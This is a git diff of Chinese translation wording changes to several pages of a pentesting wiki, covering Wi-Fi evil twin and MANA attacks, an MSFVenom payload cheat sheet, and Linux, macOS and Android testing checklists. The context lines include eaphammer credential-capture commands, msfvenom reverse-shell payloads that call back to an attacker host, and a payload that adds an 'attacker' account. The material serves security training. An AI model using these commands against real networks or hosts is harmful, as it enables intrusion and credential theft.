协议定义了一个站点如何加入扩展服务集 (ESS),但并未指定选择 ESS 或其中接入点 (AP) 的标准。 * 站点可以在共享相同 ESSID 的 AP 之间漫游,保持在建筑物或区域内的连接。 -* 该协议要求站点对 ESS 进行身份验证,但不要求 AP 对站点进行身份验证。 +* 协议要求站点对 ESS 进行身份验证,但不要求 AP 对站点进行身份验证。 ### 首选网络列表 (PNL) @@ -469,7 +469,7 @@ EAP-TTLS 的程序略有不同。在 EAP-TTLS 中,客户端通常使用 PAP * 主动探测涉及站点发送探测请求以发现附近的 AP 及其特性。 * 定向探测请求针对特定的 ESSID,帮助检测特定网络是否在范围内,即使它是一个隐藏网络。 -* 广播探测请求的 SSID 字段为空,并发送到所有附近的 AP,让站点检查任何首选网络而不披露其 PNL 内容。 +* 广播探测请求的 SSID 字段为空,并发送到所有附近的 AP,让站点检查任何首选网络,而不透露其 PNL 内容。 ## 简单的 AP 并重定向到互联网 @@ -557,13 +557,13 @@ Or using Airgeddon: `Options: 5,6,7,8,9 (inside Evil Twin attack menu).` ![](<../../.gitbook/assets/image (1088).png>) -请注意,默认情况下,如果PNL中的ESSID被保存为WPA保护,设备将不会自动连接到开放的恶意双胞胎。您可以尝试对真实AP进行DoS攻击,并希望用户手动连接到您的开放恶意双胞胎,或者您可以对真实AP进行DoS攻击并使用WPA恶意双胞胎捕获握手(使用此方法您将无法让受害者连接到您,因为您不知道PSK,但您可以捕获握手并尝试破解它)。 +请注意,默认情况下,如果PNL中的ESSID被保存为WPA保护,设备将不会自动连接到开放的恶意双胞胎。您可以尝试对真实AP进行DoS攻击,并希望用户手动连接到您的开放恶意双胞胎,或者您可以对真实AP进行DoS攻击并使用WPA恶意双胞胎来捕获握手(使用此方法,您将无法让受害者连接到您,因为您不知道PSK,但您可以捕获握手并尝试破解它)。 _某些操作系统和防病毒软件会警告用户连接到开放网络是危险的..._ ### WPA/WPA2 Evil Twin -您可以创建一个**使用WPA/2的恶意双胞胎**,如果设备已配置为使用WPA/2连接到该SSID,它们将尝试连接。无论如何,**要完成4路握手**,您还需要**知道**客户端将使用的**密码**。如果您**不知道**它,**连接将无法完成**。 +您可以创建一个**使用WPA/2的恶意双胞胎**,如果设备已配置为使用WPA/2连接到该SSID,它们将尝试连接。无论如何,**要完成4路握手**,您还需要**知道**客户端将要使用的**密码**。如果您**不知道**它,**连接将无法完成**。 ```bash ./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword" ``` @@ -606,7 +606,7 @@ GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5 **使用 Airgeddon** -`Airgeddon` 可以使用之前生成的证书为 WPA/WPA2-Enterprise 网络提供 EAP 认证。假网络将把连接协议降级为 EAP-MD5,因此能够 **捕获用户和密码的 MD5**。之后,攻击者可以尝试破解密码。\ +`Airgeddon` 可以使用之前生成的证书为 WPA/WPA2-Enterprise 网络提供 EAP 认证。假网络将把连接协议降级为 EAP-MD5,以便能够 **捕获用户和密码的 MD5**。之后,攻击者可以尝试破解密码。\ `Airgeddon` 为你提供了 **持续的恶意双胞胎攻击(嘈杂)** 或 **仅在有人连接时创建恶意攻击(平滑)** 的可能性。 ![](<../../.gitbook/assets/image (936).png>) @@ -620,17 +620,17 @@ _此方法在 PEAP 连接中进行了测试,但由于我正在解密任意 TLS 现在使用 **`hostapd-wpe`** 启动 **恶意双胞胎**,并使用该修改过的配置如往常一样。还要在执行恶意双胞胎攻击的 **接口** 中启动 **`wireshark`**。 -现在或稍后(当你已经捕获了一些认证意图时),你可以在 wireshark 中添加私有 RSA 密钥:`Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...` +现在或稍后(当你已经捕获了一些认证意图时),你可以在 `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...` 中将私有 RSA 密钥添加到 wireshark。 添加一个新条目,并用以下值填写表单:**IP 地址 = any** -- **端口 = 0** -- **协议 = data** -- **密钥文件**(**选择你的密钥文件**,为避免问题选择一个 **没有密码保护的密钥文件**)。 ![](<../../.gitbook/assets/image (687).png>) -并查看新的 **"解密的 TLS" 标签**: +然后查看新的 **"解密的 TLS" 标签**: ![](<../../.gitbook/assets/image (231).png>) -## KARMA、MANA、Loud MANA 和已知信标攻击 +## KARMA, MANA, Loud MANA 和已知信标攻击 ### ESSID 和 MAC 黑白名单 @@ -641,7 +641,7 @@ _此方法在 PEAP 连接中进行了测试,但由于我正在解密任意 TLS 2. **基于 MAC 的黑名单**: * 恶意 AP 将忽略黑名单中设备的探测请求,从而使恶意 AP 对这些特定设备不可见。 3. **基于 SSID 的白名单**: -* 恶意 AP 仅对列出的特定 ESSID 的探测请求作出响应,使其对首选网络列表(PNL)中不包含这些 ESSID 的设备不可见。 +* 恶意 AP 仅对列出的特定 ESSID 的探测请求作出响应,使其对未包含这些 ESSID 的设备不可见。 4. **基于 SSID 的黑名单**: * 恶意 AP 不会对黑名单中特定 ESSID 的探测请求作出响应,使其对寻求这些特定网络的设备不可见。 ```bash @@ -665,13 +665,13 @@ name3 ``` ### KARMA -此方法允许**攻击者创建一个恶意接入点(AP),对所有探测请求做出响应**,这些请求来自寻求连接网络的设备。该技术**通过模仿设备正在寻找的网络来欺骗设备连接到攻击者的AP**。一旦设备向这个流氓AP发送连接请求,它就会完成连接,导致设备错误地连接到攻击者的网络。 +此方法允许**攻击者创建一个恶意接入点(AP),对所有探测请求做出响应**,这些请求来自寻求连接网络的设备。此技术**通过模仿设备正在寻找的网络来欺骗设备连接到攻击者的AP**。一旦设备向这个流氓AP发送连接请求,它就会完成连接,导致设备错误地连接到攻击者的网络。 ### MANA -然后,**设备开始忽略未经请求的网络响应**,降低了原始karma攻击的有效性。然而,一种新的方法被引入,称为**MANA攻击**,由Ian de Villiers和Dominic White提出。该方法涉及流氓AP**通过对设备的广播探测请求做出响应,捕获设备的首选网络列表(PNL)**,并使用设备之前请求的网络名称(SSID)。这种复杂的攻击通过利用设备记住和优先考虑已知网络的方式,绕过了对原始karma攻击的保护。 +然后,**设备开始忽略未经请求的网络响应**,降低了原始karma攻击的有效性。然而,一种新的方法,称为**MANA攻击**,由Ian de Villiers和Dominic White引入。此方法涉及流氓AP**通过对设备的广播探测请求做出响应,捕获设备的首选网络列表(PNL)**,并使用设备之前请求的网络名称(SSID)。这种复杂的攻击通过利用设备记住和优先考虑已知网络的方式,绕过了对原始karma攻击的保护。 -MANA攻击通过监控设备的定向和广播探测请求来操作。对于定向请求,它记录设备的MAC地址和请求的网络名称,将这些信息添加到列表中。当收到广播请求时,AP会以与设备列表上的任何网络匹配的信息进行响应,诱使设备连接到流氓AP。 +MANA攻击通过监控设备的定向和广播探测请求来操作。对于定向请求,它记录设备的MAC地址和请求的网络名称,将此信息添加到列表中。当接收到广播请求时,AP会以与设备列表中的任何网络匹配的信息做出响应,诱使设备连接到流氓AP。 ```bash ./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds] ``` @@ -683,9 +683,9 @@ MANA攻击通过监控设备的定向和广播探测请求来操作。对于定 ``` ### Known Beacon attack -当**Loud MANA attack**可能不足以满足需求时,**Known Beacon attack**提供了另一种方法。此方法**通过模拟一个响应任何网络名称的AP来暴力破解连接过程,循环遍历从字典中派生的潜在ESSID列表**。这模拟了多个网络的存在,希望能与受害者的PNL中的ESSID匹配,从而促使尝试连接到伪造的AP。通过将其与`--loud`选项结合,可以增强攻击,以更具侵略性地捕获设备。 +当**Loud MANA attack**可能不足以满足需求时,**Known Beacon attack**提供了另一种方法。此方法**通过模拟一个响应任何网络名称的AP,暴力破解连接过程,循环遍历从字典中派生的潜在ESSID列表**。这模拟了众多网络的存在,希望能与受害者的PNL中的ESSID匹配,从而促使尝试连接到伪造的AP。通过将其与`--loud`选项结合,可以增强攻击,以更具侵略性地捕获设备。 -Eaphammer将此攻击实现为MANA攻击,其中列表中的所有ESSID都被充电(您还可以将其与`--loud`结合使用,以创建Loud MANA + Known beacons attack): +Eaphammer将此攻击实现为MANA攻击,其中列表中的所有ESSID都被充电(您还可以将其与`--loud`结合以创建Loud MANA + Known beacons attack): ```bash ./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds] ``` @@ -714,7 +714,7 @@ Wi-Fi Direct 连接的安全性通过 **Wi-Fi Protected Setup (WPS)** 建立, ### EvilDirect Hijacking -**EvilDirect Hijacking** 是一种特定于 Wi-Fi Direct 的攻击。它反映了 Evil Twin 攻击的概念,但针对 Wi-Fi Direct 连接。在这种情况下,攻击者冒充合法的组所有者,目的是欺骗设备连接到恶意实体。此方法可以使用 `airbase-ng` 等工具通过指定通道、ESSID 和被冒充设备的 MAC 地址来执行: +**EvilDirect Hijacking** 是一种特定于 Wi-Fi Direct 的攻击。它反映了 Evil Twin 攻击的概念,但针对 Wi-Fi Direct 连接。在这种情况下,攻击者冒充合法的组所有者,目的是欺骗设备连接到恶意实体。此方法可以使用 `airbase-ng` 等工具执行,通过指定通道、ESSID 和被冒充设备的 MAC 地址: ## References @@ -729,9 +729,9 @@ Wi-Fi Direct 连接的安全性通过 **Wi-Fi Protected Setup (WPS)** 建立, * [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)) * [https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/) -TODO: 查看 [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (使用 Facebook 登录和在强制门户中模仿 WPA) +TODO: 查看 [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (使用 Facebook 登录并模仿 WPA 在强制门户中) -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -747,8 +747,8 @@ TODO: 查看 [https://github.com/wifiphisher/wifiphisher](https://github.com/wif **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并立即与顶级黑客合作! {% hint style="success" %} -学习和实践 AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习和实践 GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习与实践 AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习与实践 GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -756,7 +756,7 @@ TODO: 查看 [https://github.com/wifiphisher/wifiphisher](https://github.com/wif * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! * **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。 +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md index 4e90572b2..c0f0796ec 100644 --- a/generic-methodologies-and-resources/reverse-shells/msfvenom.md +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -1,21 +1,21 @@ # MSFVenom - CheatSheet {% hint style="success" %} -学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
{% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -26,9 +26,9 @@ 通过实时新闻和见解,跟上快速变化的黑客世界 **最新公告**\ -了解最新的漏洞赏金发布和重要平台更新 +了解最新的漏洞赏金启动和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! *** @@ -71,6 +71,8 @@ msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f ```bash msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe ``` +{% endcode %} + ### CMD Shell {% code overflow="wrap" %} @@ -169,6 +171,8 @@ msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp ``` +{% endcode %} + ### WAR #### 反向Shell @@ -201,18 +205,18 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f ``` {% endcode %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! -**黑客见解**\ +**黑客洞察**\ 参与深入探讨黑客的刺激与挑战的内容 **实时黑客新闻**\ 通过实时新闻和见解,跟上快速变化的黑客世界 **最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 +了解最新的漏洞赏金发布和重要平台更新 **今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index 058ebb35f..7c51d110b 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -10,12 +10,12 @@ * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! * **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。 +* **通过提交 PR 分享黑客技巧到** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库。 {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -28,9 +28,9 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作! +**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作吧! -### **查找 Linux 本地权限提升向量的最佳工具:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **寻找 Linux 本地权限提升向量的最佳工具:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) ### [系统信息](privilege-escalation/#system-information) @@ -57,7 +57,7 @@ ### [进程](privilege-escalation/#processes) * [ ] 是否有 **未知软件在运行**? -* [ ] 是否有任何软件以 **超出其应有的权限** 运行? +* [ ] 是否有软件以 **超出其应有的权限** 运行? * [ ] 搜索 **正在运行进程的漏洞**(特别是正在运行的版本)。 * [ ] 你能 **修改任何正在运行进程的二进制文件** 吗? * [ ] **监控进程**,检查是否有任何有趣的进程频繁运行。 @@ -65,7 +65,7 @@ ### [计划任务/Cron 任务?](privilege-escalation/#scheduled-jobs) -* [ ] [**PATH**](privilege-escalation/#cron-path) 是否被某些 cron 修改,你能 **写入** 吗? +* [ ] [**PATH**](privilege-escalation/#cron-path) 是否被某些 cron 修改,并且你可以 **写入**? * [ ] 在 cron 任务中有任何 [**通配符**](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection) 吗? * [ ] 有一些 [**可修改的脚本**](privilege-escalation/#cron-script-overwriting-and-symlink) 正在 **执行** 或在 **可修改文件夹** 中? * [ ] 你是否检测到某些 **脚本** 可能或正在被 [**频繁执行**](privilege-escalation/#frequent-cron-jobs)?(每 1、2 或 5 分钟) @@ -99,11 +99,11 @@ ### [用户](privilege-escalation/#users) * [ ] 通用用户/组 **枚举** -* [ ] 你有一个 **非常大的 UID** 吗?机器 **是否存在漏洞**? -* [ ] 你能 [**通过你所属的组提升权限**](privilege-escalation/interesting-groups-linux-pe/) 吗? +* [ ] 你有一个 **非常大的 UID** 吗?机器 **是否脆弱**? +* [ ] 你能通过你所属的 [**组**](privilege-escalation/interesting-groups-linux-pe/) **提升权限** 吗? * [ ] **剪贴板** 数据? * [ ] 密码策略? -* [ ] 尝试 **使用** 你之前发现的每个 **已知密码** 登录 **每个** 可能的 **用户**。也尝试不带密码登录。 +* [ ] 尝试 **使用** 你之前发现的每个 **已知密码** 登录 **每个** 可能的 **用户**。尝试不带密码登录。 ### [可写 PATH](privilege-escalation/#writable-path-abuses) @@ -113,7 +113,7 @@ * [ ] 你能执行 **任何带 sudo 的命令** 吗?你能用它来以 root 身份 **读取、写入或执行** 任何东西吗?([**GTFOBins**](https://gtfobins.github.io)) * [ ] 是否有任何 **可利用的 SUID 二进制文件**?([**GTFOBins**](https://gtfobins.github.io)) -* [ ] [**sudo** 命令是否 **受限于路径**?你能 **绕过** 限制吗](privilege-escalation/#sudo-execution-bypassing-paths)? +* [ ] [**sudo** 命令是否 **受限** 于 **路径**?你能 **绕过** 限制吗](privilege-escalation/#sudo-execution-bypassing-paths)? * [ ] [**没有指定路径的 Sudo/SUID 二进制文件**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? * [ ] [**指定路径的 SUID 二进制文件**](privilege-escalation/#suid-binary-with-command-path)?绕过 * [ ] [**LD\_PRELOAD 漏洞**](privilege-escalation/#ld\_preload) @@ -147,11 +147,11 @@ * [ ] **passwd/shadow 文件** - 读取敏感数据?写入权限提升? * [ ] **检查常见的有趣文件夹** 是否有敏感数据 * [ ] **奇怪的位置/拥有的文件,** 你可能有权限访问或更改可执行文件 -* [ ] **在最后几分钟内修改** +* [ ] **最近几分钟内修改过** * [ ] **Sqlite 数据库文件** * [ ] **隐藏文件** * [ ] **PATH 中的脚本/二进制文件** -* [ ] **Web 文件**(密码?) +* [ ] **网页文件**(密码?) * [ ] **备份**? * [ ] **已知包含密码的文件**:使用 **Linpeas** 和 **LaZagne** * [ ] **通用搜索** @@ -168,7 +168,7 @@ * [ ] 你能 [**利用 NFS 提升权限**](privilege-escalation/#nfs-privilege-escalation) 吗? * [ ] 你需要 [**逃离限制性 shell**](privilege-escalation/#escaping-from-restricted-shells) 吗? -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -181,7 +181,7 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作! +**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作吧! {% hint style="success" %} 学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ @@ -193,7 +193,7 @@ * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! * **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。 +* **通过提交 PR 分享黑客技巧到** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库。 {% endhint %} diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index 68762ed86..17b676192 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -15,7 +15,7 @@ {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -23,12 +23,12 @@ 参与深入探讨黑客的刺激与挑战的内容 **实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 +通过实时新闻和见解,保持对快速变化的黑客世界的了解 **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们,和顶尖黑客一起合作!** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ## 基础 MacOS @@ -58,14 +58,14 @@ [mac-os-architecture](mac-os-architecture/) {% endcontent-ref %} -* 常见的 macOS n**etwork 服务与协议** +* 常见的 macOS 网络服务与协议 {% content-ref url="macos-protocols.md" %} [macos-protocols.md](macos-protocols.md) {% endcontent-ref %} * **开源** macOS: [https://opensource.apple.com/](https://opensource.apple.com/) -* 下载 `tar.gz` 文件时,将 URL 例如 [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) 更改为 [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) +* 要下载 `tar.gz`,将 URL 更改为 [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) ### MacOS MDM @@ -94,20 +94,20 @@ 如果 **以 root 身份运行的进程写入** 一个可以被用户控制的文件,用户可能会利用这一点来 **提升权限**。\ 这可能发生在以下情况下: -* 使用的文件已经由用户创建(属于用户) +* 使用的文件已经由用户创建(由用户拥有) * 使用的文件因组而可被用户写入 * 使用的文件位于用户拥有的目录中(用户可以创建该文件) * 使用的文件位于 root 拥有的目录中,但用户因组而具有写入权限(用户可以创建该文件) -能够 **创建一个将被 root 使用的文件**,允许用户 **利用其内容**,甚至创建 **符号链接/硬链接** 指向其他位置。 +能够 **创建一个将被 root 使用的文件**,允许用户 **利用其内容**,甚至创建 **符号链接/硬链接** 指向另一个位置。 -对于这种漏洞,不要忘记 **检查易受攻击的 `.pkg` 安装程序**: +对于这类漏洞,不要忘记 **检查易受攻击的 `.pkg` 安装程序**: {% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} [macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md) {% endcontent-ref %} -### 文件扩展名与 URL 方案应用处理程序 +### 文件扩展名与 URL 方案应用程序处理程序 通过文件扩展名注册的奇怪应用程序可能会被滥用,不同的应用程序可以注册以打开特定协议 @@ -145,7 +145,7 @@ * [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) * [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY) -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -153,12 +153,12 @@ 参与深入探讨黑客的刺激与挑战的内容 **实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 +通过实时新闻和见解,保持对快速变化的黑客世界的了解 **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们,和顶尖黑客一起合作!** [**Discord**](https://discord.com/invite/N3FrSbmwdy) {% hint style="success" %} 学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index 4f8ac0e21..4a428b131 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -9,13 +9,13 @@ 支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。 {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -41,14 +41,14 @@ ## ADB (Android 调试桥) 这是您连接到 Android 设备(模拟或物理)所需的主要工具。\ -**ADB** 允许从计算机通过 **USB** 或 **网络** 控制设备。此工具使 **文件** 双向 **复制**、**安装** 和 **卸载** 应用程序、**执行** shell 命令、**备份** 数据、**读取** 日志等功能成为可能。 +**ADB** 允许从计算机通过 **USB** 或 **网络** 控制设备。此工具使得 **双向复制** 文件、**安装** 和 **卸载** 应用程序、**执行** shell 命令、**备份** 数据、**读取** 日志等功能成为可能。 查看以下 [**ADB 命令**](adb-commands.md) 列表,了解如何使用 adb。 ## Smali 有时修改 **应用程序代码** 以访问 **隐藏信息**(可能是经过良好混淆的密码或标志)是很有趣的。然后,反编译 apk、修改代码并重新编译可能会很有趣。\ -[**在本教程中**,您可以 **学习如何反编译 APK,修改 Smali 代码并重新编译 APK**,以实现新功能](smali-changes.md)。这在 **动态分析** 中作为 **多项测试的替代方案** 将非常有用。然后,**始终记住这个可能性**。 +[**在本教程中**,您可以 **学习如何反编译 APK,修改 Smali 代码并重新编译 APK**,以实现新功能](smali-changes.md)。这在 **动态分析** 期间作为多项测试的 **替代方案** 可能非常有用。然后,**始终记住这个可能性**。 ## 其他有趣的技巧 @@ -90,14 +90,14 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed **检查应用程序的 \_Manifest.xml**_\*\* 和 \*\*_**strings.xml**\_\*\* 文件可以揭示潜在的安全漏洞\*\*。这些文件可以通过反编译器访问,或通过将 APK 文件扩展名重命名为 .zip 然后解压缩来访问。 -从 **Manifest.xml** 中识别的**漏洞**包括: +从 **Manifest.xml** 中识别出的**漏洞**包括: * **可调试应用程序**:在 _Manifest.xml_ 文件中设置为可调试(`debuggable="true"`)的应用程序存在风险,因为它们允许连接,可能导致被利用。有关如何利用可调试应用程序的进一步理解,请参考有关在设备上查找和利用可调试应用程序的教程。 * **备份设置**:处理敏感信息的应用程序应明确设置 `android:allowBackup="false"` 属性,以防止通过 adb 进行未经授权的数据备份,特别是在启用 USB 调试时。 * **网络安全**:_res/xml/_ 中的自定义网络安全配置(`android:networkSecurityConfig="@xml/network_security_config"`)可以指定安全细节,如证书固定和 HTTP 流量设置。一个例子是允许特定域的 HTTP 流量。 * **导出活动和服务**:在清单中识别导出的活动和服务可以突出可能被滥用的组件。在动态测试期间的进一步分析可以揭示如何利用这些组件。 * 